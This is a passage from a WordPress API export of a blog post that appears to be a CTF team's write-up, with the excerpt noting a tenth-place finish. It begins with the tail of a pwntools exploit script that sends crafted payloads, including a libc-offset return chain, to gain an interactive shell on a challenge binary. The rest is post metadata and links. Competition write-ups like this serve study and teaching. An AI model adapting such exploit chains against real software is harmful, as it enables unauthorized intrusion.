p64(rdi)[:7]<br>io.sendline(payload)<br>sleep(1)<br><br>payload = p64(0x601290)<br>io.sendline(payload)<br>sleep(1)<br>payload = b'a' * 0x10 + p64(0x6012a0) + p64(0x4005E5)<br>io.sendline(payload)<br>sleep(1)<br>#debug()<br>payload = (p64(-293 - libc.sym[\"gets\"] + 0xebd3f) + p64(0) + p64(0) + p64(0x40065A) + p64(0) + p64(0x6010a0) + p64(0x6014f8) + p64(0) * 3 + p64(0x400649)).ljust(0xa0, b'\\x00') + p64(0x601468)<br>io.sendline(payload)<br>io.interactive()<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u961f\u4f0d\u540d Escape in the sun \u6392\u540d 10 \u611f\u8c22\u6bcf\u4e00\u4f4d\u961f\u53cb \u90fd\u5f88\u5f3a \u819c\u62dc\u67ef\u270c\ufe0f Misc next is the en &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-149","post","type-post","status-publish","format-standard","hentry","category-some-competition"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/149","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/comments?post=149"}],"version-history":[{"count":3,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/149\/revisions"}],"predecessor-version":[{"id":213,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/149\/revisions\/213"}],"wp:attachment":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/media?parent=149"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/categories?post=149"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/tags?post=149"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}